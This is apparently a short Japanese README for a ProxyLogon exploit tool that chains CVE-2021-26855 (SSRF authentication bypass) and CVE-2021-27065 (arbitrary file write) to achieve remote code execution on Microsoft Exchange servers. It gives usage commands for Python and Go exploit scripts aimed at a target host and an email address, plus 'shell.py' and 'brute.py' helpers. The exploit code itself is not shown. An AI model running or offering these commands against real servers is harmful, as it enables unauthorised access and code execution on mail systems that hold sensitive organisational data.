
Microsoft Exchange Serverを標的としたCVE-2021-26855およびCVE-2021-27065のエクスプロイトチェーン。SSRFと任意ファイル書き込みを介した認証バイパスとリモートコード実行を可能にします。
ProxyLogonは、CVE-2021-26855の正式な総称です。これはMicrosoft Exchange Serverの脆弱性であり、攻撃者が認証をバイパスして管理者になりすますことを可能にします。また、このバグを別の認証後任意ファイル書き込みの脆弱性であるCVE-2021-27065と連鎖させて、コード実行を達成しました。
usage:
sudo python3 proxylogon.py --host=target.com [email protected]
sudo python3 proxylogon.py --host=target.com --mails=./mails.txt
usage:
go run proxylogon.go -u target.com -e [email protected]
sudo python2 /manual/check.py
sudo python2 /manual/shell.py
sudo python2 /manual/brute.py